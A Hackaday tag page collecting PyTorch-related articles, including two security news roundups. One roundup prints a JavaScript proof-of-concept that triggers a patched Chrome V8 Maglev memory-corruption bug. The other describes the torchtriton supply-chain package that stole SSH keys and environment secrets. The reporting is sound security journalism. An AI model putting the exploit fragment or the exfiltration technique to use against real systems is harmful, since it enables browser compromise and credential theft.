pytorch – Hackaday

Import GPU: Python Programming with CUDA

Bryan Cockfield — Wed, 26 Feb 2025 03:00:30 +0000

Every few years or so, a development in computing results in a sea change and a need for specialized workers to take advantage of the new technology. Whether that’s COBOL in the 60s and 70s, HTML in the 90s, or SQL in the past decade or so, there’s always something new to learn in the computing world. The introduction of graphics processing units (GPUs) for general-purpose computing is perhaps the most important recent development for computing, and if you want to develop some new Python skills to take advantage of the modern technology take a look at this introduction to CUDA which allows developers to use Nvidia GPUs for general-purpose computing.

Of course CUDA is a proprietary platform and requires one of Nvidia’s supported graphics cards to run, but assuming that barrier to entry is met it’s not too much more effort to use it for non-graphics tasks. The guide takes a closer look at the open-source library PyTorch which allows a Python developer to quickly get up-to-speed with the features of CUDA that make it so appealing to researchers and developers in artificial intelligence, machine learning, big data, and other frontiers in computer science. The guide describes how threads are created, how they travel along within the GPU and work together with other threads, how memory can be managed both on the CPU and GPU, creating CUDA kernels, and managing everything else involved largely through the lens of Python.

Getting started with something like this is almost a requirement to stay relevant in the fast-paced realm of computer science, as machine learning has taken center stage with almost everything related to computers these days. It’s worth noting that strictly speaking, an Nvidia GPU is not required for GPU programming like this; AMD has a GPU computing platform called ROCm but despite it being open-source is still behind Nvidia in adoption rates and arguably in performance as well. Some other learning tools for GPU programming we’ve seen in the past include this puzzle-based tool which illustrates some of the specific problems GPUs excel at.

This Week in Security: Browser Exploits, Play Protect, and Turn ON your Firewall!

Jonathan Bennett — Fri, 20 Oct 2023 14:00:24 +0000

Google Chrome has done a lot of work on JavaScript performance, pushing the V8 engine to more and more impressive feats. Recently, that optimization has one more piece, the Maglev compiler, which sits between Sparkplug and TurboFan, as a mid-tier optimization step. With a Just In Time (JIT) system, the time saving of code optimization steps has to be carefully weighed against the time costs, and Maglev is another tool in that endless hunt for speed. And with anything this complicated, there’s the occasional flaw found in the system. And of course, because we’re talking about it here, it’s a security vulnerability that results in Remote Code Execution (RCE).

The trick is to use Maglev’s optimization against it. Set up a pair of classes, such that B extends A. Calling new B() results in an attempt to use the constructor from A. Which works, because the compiler checks to make sure that the constructors match before doing so. There’s another way to call a constructor in JS, something like Reflect.construct(B, [], Array);. This calls the B constructor, but indicates that the constructor should return an Array object. You may notice, there’s no array in the A class below. Tricking the compiler into using the parent class constructor in this fashion results in the array being uninitialized, and whatever happens to be in memory will set the length of the array.

class A {}

var x = Array;

class B extends A {
  constructor() {
    x = new.target;
    super();
  }
}
function construct() {
  var r = Reflect.construct(B, [], x);
  return r;
}
//Compile optimize code
for (let i = 0; i < 2000; i++) construct();
//-----------------------------------------
//Trigger garbage collection to fill the free space of the heap
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);

corruptedArr = construct();  // length of corruptedArr is 0, try again...
corruptedArr = construct();  // length of corruptedArr takes the pointer of an object, which gives a large value

The trick here is to set up several data structures together so the uninitialized array can be used to corrupt the other objects, giving arbitrary read and write of the compiler heap. Shellcode can be loaded in as other data structures, and a function pointer can be overwritten to jump to the shellcode. RCE from simply running Javascript on a webpage. Thankfully this one was found, reported privately, and finally fixed on August 2nd.

Safari, Too

The Threat Analysis Group from Google did an analysis of an iOS Safari 0-day exploit chain, and it’s got an interesting trick to look at. Safari has added an extra sandbox layer to keep the web renderer engine from interacting with GPU drivers directly. This attack chain contains an extra exploit to make that hop, and it uses Safari Inter-Process Communication (IPC) to do it. The vulnerability is a simple one, a buffer overflow in the GPU process. But the rest of the story is anything but simple.

The rest of the exploit reads like building a ship in a bottle, using the toehold in the rendering process to reach in and set up an exploit in the GPU process. The process is to build an arbitrary read, an arbitrary write, flip bits to turn off security settings, and then use object deserialization to run NSExpression. The full write-up goes through the details in excruciating detail. It’s notable that iOS security has reached the point of hardening that it takes so much effort to turn an RCE into an actual system exploit.

Play Protect Expands

It’s no great secret that the ease of side-loading apps is one of Android’s best and worst features when compared to the iPhone. It’s absolutely the best, because it allows bypassing the Play store, running a de-Googled phone, and easily installing dev builds. But with that power comes great ability to install malware. It makes sense — Google scans apps on the Play Store for malware, so the easy way around that problem is to convince users to install malicious APKs directly. And that leads us to this week’s news, that Google’s Play Store is bringing the ability to review sideload apps upon installation, and warn the user if something seems particularly off.

It sounds very similar to the approach taken by Windows Defender, though hopefully malicious apps won’t be able to hijack the security process to block legitimate installs. One concerning detail is the radio silence about disabling the feature, either globally or on a per-install basis. The feature preview only shows the options to either scan the app, uploading some details to Google, or cancel the install. Hopefully this will work like visiting an insecure site in Chrome, where an extra click or two is enough to proceed anyways.

Where’s the Firewall?

Earlier this month, researchers at Oligo published a system takeover exploit chain in TorchServe. It’s… a legitimate problem for many TorchServe installs, scoring a CVSS 9.9. And arguably, it’s really not a vulnerability at all. It contains a default that isn’t actually default, and a Server-Side Request Forgery (SSRF) that’s not a forgery. And for all the ups and downs, apparently nobody had the thought that a default ALLOW firewall might be a bad idea. *sigh* Let’s dive in.

PyTorch is a Python library for machine learning, and it’s become one of the rising starts of the AI moment we’re still in the midst of. One of the easiest ways to get PyTorch running for multiple users is the TorchServe project, which is put together with a combination of Python and Java, which will be important in a moment. The idea is that you can load a model into the server, and users can run their queries using a simple REST interface. TorchServe actually has three API interfaces, the normal inference API, a metrics API, and the management API, each on a different port.

The management API doesn’t implement any authentication checks, and the documentation does warn about this, stating that “TorchServe only allows localhost access by default”. It turns out that this statement is absolutely true: TorchServe binds that interface to 127.0.0.1 by default. While the Oligo write-up gets that technicality wrong, there is a valid point to be made that some of the example configs set the management interface bind on 0.0.0.0. Docker is a different animal altogether, by the way. Binding to 127.0.0.1 inside a docker container blocks all traffic from outside the container, so the observation that the official TorchServe docker image uses 0.0.0.0 is a bit silly. So to recap, it’s bad to put insecure configuration in your documentation. The TorchServe project has worked to fix this.

Next, The second vulnerability comes with a CVE! CVE-2023-43654 is an SSRF — a weakness where an attacker can manipulate a remote server into sending HTTP requests to unintended places. And technically, that’s true. A request to the management API can specify where the server should attempt to download a new inference model. There is an allowed_urls setting that specifies how to filter those requests, and by default it allows any file or HTTP/S request. Could that be used to trigger something unintended on an internal network? Sure. Should the allowed URLs setting default to allowing anything? Probably not. Is this issue on the backend management API actually an SSRF worthy of a CVSS 9.8 CVE? Not even close.

And the last issue, CVE-2022-1471, is a Java deserialization RCE. This one is actually a problem — sort of. The issue is actually in SnakeYAML, and was fixed last year. One of the great disadvantages of using Java is that you have to rebuild the project with manually updated libraries. TorchServe didn’t bother to pull the fix till now. If your TorchServe server loads an untrusted inference models, this vulnerability leads to RCE. Except, loading an inference model executes arbitrary code by design. So it’s yet another technically correct CVE that’s utterly bogus.

Now, don’t take my tone of disdain as a complete dismissal of the findings. As far as I can tell, there really are “tens of thousands of IP addresses” exposing the PyServe administrative interface to the Internet. That really is a problem, and good for researchers at Oligo for putting the problem together clearly. But there’s something notably missing from the write-up or recommendations: Configuring the firewall! Why is anybody running a server with a public IP with a default ALLOW firewall?

Bits and Bytes

Forget the Ides of March, Beware the Cisco. This week we got news that there’s a 0-day vulnerability being exploited in the wild, in IOS XE. That firmware can run on switches, routers, access points, and more. And just a couple days ago, a staggering 40,000+ devices were found to be compromised. If you had the misfortune of running a Cisco IOS XE device, and had the HTTP interface exposed online, or to any untrusted traffic, just assume it’s compromised. Oof.

The Hello World of GPT?

Al Williams — Tue, 11 Apr 2023 02:00:35 +0000

Someone wants to learn about Arduino programming. Do you suggest they blink an LED first? Or should they go straight for a 3D laser scanner with galvos, a time-of-flight sensor, and multiple networking options? Most of us need to start with the blinking light and move forward from there. So what if you want to learn about the latest wave of GPT — generative pre-trained transformer — programs? Do you start with a language model that looks at thousands of possible tokens in large contexts? Or should you start with something simple? We think you should start simple, and [Andrej Karpathy] agrees. He has a workbook that makes a tiny GPT that can predict the next bit in a sequence. It isn’t any more practical than a blinking LED, but it is a manageable place to start.

The simple example starts with a vocabulary of two. In other words, characters are 1 or 0. It also uses a context size of 3, so it will look at 3 bits and use that to infer the 4th bit. To further simplify things, the examples assume you will always get a fixed-size sequence of tokens, in this case, eight tokens. Then it builds a little from there.

The notebook uses PyTorch to create a GPT, but since you don’t need to understand those details, the code is all collapsed. You can, of course, expand it and see it, but at first, you should probably just assume it works and continue the exercise. You do need to run each block of code in sequence, even if it is collapsed.

The GPT is trained on a small set of data over 50 iterations. There should probably be more training, but this shows how it works, and you can always do more yourself if you are so inclined.

The real value here is to internalize this example and do more yourself. But starting from something manageable can help solidify your understanding. If you want to deepen your understanding of this kind of transformer, you might go back to the original paper that started it all.

All this hype over AI GPT-related things is really just… well… hype. But there is something there. We’ve talked about what it might mean. The statistical nature of these things, by the way, is exactly the way other software can figure out if your term paper was written by an AI.

This Week in Security: Lastpass Takeaway, Bitcoin Loss, and PyTorch

Jonathan Bennett — Fri, 06 Jan 2023 18:00:50 +0000

We mentioned the LastPass story in closing a couple weeks ago, but details were still a bit scarce. The hope was that LastPass would release more transparent information about what happened, and how many accounts were accessed. Unfortunately it looks like the December 22nd news release is all we’re going to get. For LastPass users, it’s time to make some decisions.

To recap, an attacker used information from the August 2022 breach to target a LastPass Employee with a social engineering ploy. This succeeded, and the attacker managed to access LastPass backups, specifically a customer account database and customer vaults. There has been no official word of how many users’ data were included, but the indication is that it was the entire dataset. And to make matters worse, the encrypted vault is only partially encrypted. Saved URLs were exposed as plain-text to the attacker, though usernames and passwords are still encrypted using your master password.

So what should a LastPass user do now? It depends. We can assume that whoever has the LastPass vault data is currently throwing every password list available at it. If you used a weak password — derived from words in any language or previously compromised — then it’s time to change all of your passwords that were in the vault. They are burned.

Whether you stick with LastPass or go to another solution, it’s just a matter of time until your vault is cracked. Making matters worse, some old Lastpass accounts only use 5,000 rounds of PBKDF2 (Password-Based Key Derivation Function) hashing. New accounts are set to use over 100,000 iterations, but some older accounts could still use the old setting. The result is that an attack against the encrypted vault runs much faster. The number of iterations is almost certainly in the stolen data, so these accounts will likely be tested first. If you’re a long-time user, change all of the passwords stored in the vault.

There is some good news. The vaults use a salt to go with the passwords — additional data that gets folded into the PBKDF2 function. It means that the password cracking procedure has to be done individually per user. If you’re just another uninteresting user, you might not ever get targeted for cracking. But if you might be interesting, or have URLs that look interesting, there’s likely a higher chance of being targeted. And unfortunately, these were plain text.

So how does the math stack up? Lucky for us, [Wladimir Palant] ran the numbers for us. A minimum complexity password, using the 2018 rules for a LastPass password, results in 4.8×10^18 possible password combinations. An RTX 4090 can sustain in the ballpark of 1.7 million guesses per second on an account using only 5,000 iterations of PBKDF2, or 88,000 guesses per second on a properly secured account. That’s 44,800 years, and 860,000 years to break a vault open, assuming one RTX4090 working on it. Some very rough math on the size of a three-letter-agency datacenter would suggest that devoting the entirety of one of these datacenters to the task would crack the less secure vault in under 4 months. With an account using the full security settings, this rises to nearly six years. Keep in mind, this approach is a best-case scenario for an attacker, and represents devoting a $1.5 billion datacenter to the task for an extended period. But it also assumes you chose your password randomly.

But here’s the rub: If the risk is enough to push you to action, it’s not enough to change your LastPass password. Whether you stay with LastPass or move to another solution, you’ll need to change the master password first, and then go through the grueling process of changing every password in your LastPass vault. This whole mess was certainly a failing on the part of LastPass, and their post-incident reporting certainly leaves some transparency to be desired. Unencrypted URLs associated with each saved password is unfortunate. But the central tenet, that not even LastPass can access your saved passwords, seems to have held up.

Bitcoin Hacker Hacked

Luke Dashjr is a Bitcoin Core developer, the primary signer of the Bitcoin Knots software, and has suffered a major security breach. This may be a follow-on incident from a November physical attack, where someone managed to reboot his co-located server from a flash drive, and install a backdoor. That one was caught, and the malware was seemingly removed. Luke lost a total of about 200 bitcoin, out of both his active (hot) and offline (cold) wallets. He’s treating this as a total compromise, and has warned that his PGP key should be suspect as well. That means recent releases of Bitcoin Knots should be suspect, too.

There have been several theories floated, everything from a “boating accident” to avoid tax liability, to a known problem with random number generation on the Talos system he uses (CVE-2019-15847). None of this seems quite as likely as the idea that this was a missed rootkit on the compromised server, and lateral movement back into [Luke]’s home network. Either way, it’s a terrible mess, and we’re hopefully looking forward to a positive resolution.

PyTorch Nightly Compromise

The PyTorch-nightly package was hit with a dependency confusion attack, active between December 25th and December 30th. The issue here is that PyTorch hosts a torchtriton package as part of its nightly repo, and that package name wasn’t claimed on PyPi. So, all someone had to do was come along and upload a package under that name, and presto, any new pip install of PyTorch-nightly grabbed the PyPi version. The malicious package vacuums up system data, like current nameservers, hostname, username, working directory, and environment variables, and sends those to h4ck[dot]cfd (Archive link). That bit isn’t so bad, though environment variables are sure to include auth tokens. The kicker is that bash history, /etc/hosts, /etc/passwd, ~/.gitconfig, ~/.ssh, and the first 1000 files in the home directory are all packaged up and uploaded, too. On a modern system, the passwd file doesn’t actually contain any password hashes, but the .ssh folder may very well contain private SSH keys. Yikes.

Now, the developer behind this bogus package has been found, and claims that this was intended to be security research, and promises that all data will be deleted. The stolen data was claimed to be in order to positively ID the victim, presumably for the purpose of collecting bug bounties. This has some element of believability, but really doesn’t matter, as any secrets leaked in this incident need to be revoked regardless. The silver lining is that no malicious code is run simply by installing the package, but a Python script would need to do an explicit import triton in order to trigger the payload. The PyTorch project has renamed the package to pytorch-triton, and reserved that project name on PyPi to avoid a repeat incident.

Mapping Vulnerable Citrix Installs

There have been a couple of critical vulnerabilities fixed recently in Citrix ADC and Citrix Gateway, one of which prompting a notice from the NSA that an APT (Advanced Persistent Threat) was actively compromising systems with the bug. The fixed version numbers are known, and that made researchers at Fox It, part of NCC Group, wonder. Is there a way to determine the release version of a Citrix device from the pre-authentication HTTP response? Spoiler: There is. The /vpn/index.html endpoint contains a hash that seems to vary between release versions. The only trick left was to find a quick way to map the hash back to the version.

Enter Google’s Cloud Marketplace, which has a one-click option to spin up a new Citrix virtual machine. One SSH session later confirmed the version and corresponding hash. That’s one down. Also part of Google’s service is a zip file that has information about older versions, including image names that can be used to download previous versions as a qcow2 virtual disk image — easy enough to grab the hash and version number from there. Between these images and the Citrix download page, quite a few of the known hashes were identified, but strangely, there are some hashes observed in the wild that didn’t seem to line up with a known release. By finding a specific read-only file that is also accessible remotely, it’s possible to get an accurate timestamp on when a given firmware was built. That fills in the gaps on the known version numbers, and let them chart out exactly what versions were showing up in the wild.

Because the hash was part of the data collected by scanning services like Shodan, it’s possible to look at the history of installed versions, as well as the current state. There’s a very noticeable change in the deployed versions, nicely corresponding to the NSA warning. Even at that, there are many deployed Citrix servers that still appear to be running vulnerable firmware, though the details of the deployment may mean they are not in imminent danger. It’s a very interesting look at how we end up with statistics like these.

Bits and Bytes

Synology’s VPN server has a critical vulnerability, CVE-2022-43931, that scores a CVSS score of 10, and allows an unauthenticated attacker to execute arbitrary commands. Patched releases are available. The flaw itself is an out-of-bounds write in the Remote Desktop service, so there is some hope that this vulnerable service isn’t widely exposed to the open Internet.

Here’s the exploit you didn’t know you needed, breaking out of the Lua interpreter to get shellcode execution. The trick here is to encode shellcode as numbers, then trick the runtime into unaligned access, which jumps program execution into the data. Another fun trick is that the target Lua interpreter will let you run Lua bytecode and trusts it just like regular Lua code. So what’s the purpose of all this? Sometimes the fun is in the journey.

What do you get when bored security researchers decide to poke at the mobile app for electric scooters? Lots of mysteriously honking and flashing scooters. And when those same researchers up the ante and try to make cars honk? A truly impressive list of remote vulnerabilities in vehicles of all brands. From live GPS tracking, to turning on lights, unlocking doors, and even remotely starting vehicles, [Sam Curry] and his band of merry hackers made it happen. To the credit of the many vendors that were affected, pretty much every vulnerability ends with “they fixed it right away.”

Edging Ahead When Learning On The Edge

Matthew Carlson — Tue, 21 Jun 2022 17:00:49 +0000

“With the power of edge AI in the palm of your hand, your business will be unstoppable.”

That’s what the marketing seems to read like for artificial intelligence companies. Everyone seems to have cloud-scale AI-powered business intelligence analytics at the edge. While sounding impressive, we’re not convinced that marketing mumbo jumbo means anything. But what does AI on edge devices look like these days?

Being on the edge just means that the actual AI evaluation and maybe even fine-tuning runs locally on a user’s device rather than in some cloud environment. This is a double win, both for the business and for the user. Privacy can more easily be preserved as less information is transmitted back to a central location. Additionally, the AI can work in scenarios where a server somewhere might not be accessible or provide a response quickly enough.

Google and Apple have their own AI libraries, ML Kit and Core ML, respectively. There are tools to convert Tensorflow, PyTorch, XGBoost, and LibSVM models into formats that CoreML and ML Kit understand. But other solutions try to provide a platform-agnostic layer for training and evaluation. We’ve also previously covered Tensorflow Lite (TFL), a trimmed-down version of Tensorflow, which has matured considerably since 2017.

For this article, we’ll be looking at PyTorch Live (PTL), a slimmed-down framework for adding PyTorch models to smartphones. Unlike TFL (which can run on RPi and in a browser), PTL is focused entirely on Android and iOS and offers tight integration. It uses a react-native backed environment which means that it is heavily geared towards the node.js world.

No Cloud Required

Right now, PTL is very early. It runs on macOS (though no Apple Silicon support), but Windows and Linux compatibility is apparently forthcoming. It comes with a handy CLI that makes starting a new project relatively painless. After installing and creating a new project, the experience is smooth, with a few commands taking care of everything. The tutorial was straightforward, and soon we had a demo that could recognize numbers.

It was time to take the tutorial further and create a custom model. Using the EMNIST dataset, we created a trained resnet9 model with the letters dataset using help from a helpful GitHub repo. Once we had a model, it was simple enough to use the PyTorch utilities to export the model to the lite environment. With some tweaks to the code (which live reloads on the simulator), it recognized characters instead of numbers.

We suspect someone a little more steeped in the machine learning world would be able to take this farther than us. PTL has other exciting demos, such as on-device speech recognition and live video segmentation and recognition. Overall the experience was easy, and the scenarios we were trying were relatively easy to implement.

If you’re already in a smartphone react-native world, PTL seems simple to integrate and use. Outside of that, a lot is left unsupported. Tensorflow Lite was similarly constrained when we first covered it and has since matured and gained new platforms and features, becoming a powerful library with many supported platforms. Ultimately, we’ll see what PyTorch Live grows into. There’s already support for GPUs and neural engines in the beta branch.

Putting Perseverance Rover’s View Into Satellite View Context

Roger Cheng — Tue, 30 Mar 2021 08:00:00 +0000

It’s always fun to look over aerial and satellite maps of places we know, seeing a perspective different from our usual ground level view. We lose that context when it’s a place we don’t know by heart. Such as, say, Mars. So [Matthew Earl] sought to give Perseverance rover’s landing video some context by projecting onto orbital imagery from ESA’s Mars Express. The resulting video (embedded below the break) is a fun watch alongside the technical writeup Reprojecting the Perseverance landing footage onto satellite imagery.

Some telemetry of rover position and orientation were transmitted live during the landing process, with the rest recorded and downloaded later. Surprisingly, none of that information was used for this project, which was based entirely on video pixels. This makes the results even more impressive and the techniques more widely applicable to other projects. The foundational piece is SIFT (Scale Invariant Feature Transform), which is one of many tools in the OpenCV toolbox. SIFT found correlations between Perseverance’s video frames and Mars Express orbital image, feeding into a processing pipeline written in Python for results rendered in Blender.

While many elements of this project sound enticing for applications in robot vision, there are a few challenges touched upon in the “Final Touches” section of the writeup. The falling heatshield interfered with automated tracking, implying this process will need help to properly understand dynamically changing environments. Furthermore, it does not seem to run fast enough for a robot’s real-time needs. But at first glance, these problems are not fundamental. They merely await some motivated people to tackle in the future.

This process bears some superficial similarities to projection mapping, which is a category of projects we’ve featured on these pages. Except everything is reversed (camera instead of video projector, etc.) making the math an entirely different can of worms. But if projection mapping sounds more to your interest, here is a starting point.

[via Dr. Tanya Harrison @TanyaOfMars]

OpenSource GUI Tool For OpenCV And DeepLearning

Inderpreet Singh — Sat, 29 Feb 2020 03:00:58 +0000

AI and Deep Learning for computer vision projects has come to the masses. This can be attributed partly to the community projects that help ease the pain for newbies. [Abhishek] contributes one such project called Monk AI which comes with a GUI for transfer learning.

Monk AI is essentially a wrapper for Computer Vision and deep learning experiments. It facilitates users to finetune deep neural networks using transfer learning and is written in Python. Out of the box, it supports Keras and Pytorch and it comes with a few lines of code; you can get started with your very first AI experiment.

[Abhishek] also has an Object Detection wrapper(GitHub) that has some useful examples as well as a Monk GUI(GitHub) tool that looks similar to the tools available in commercial packages for running, training and inference experiments.

The documentation is a work in progress though it seems like an excellent concept to build on. We need more tools like these to help more people getting started with Deep Learning. Hardware such as the Nvidia Jetson Nano and Google Coral are affordable and facilitate the learning and experimentation.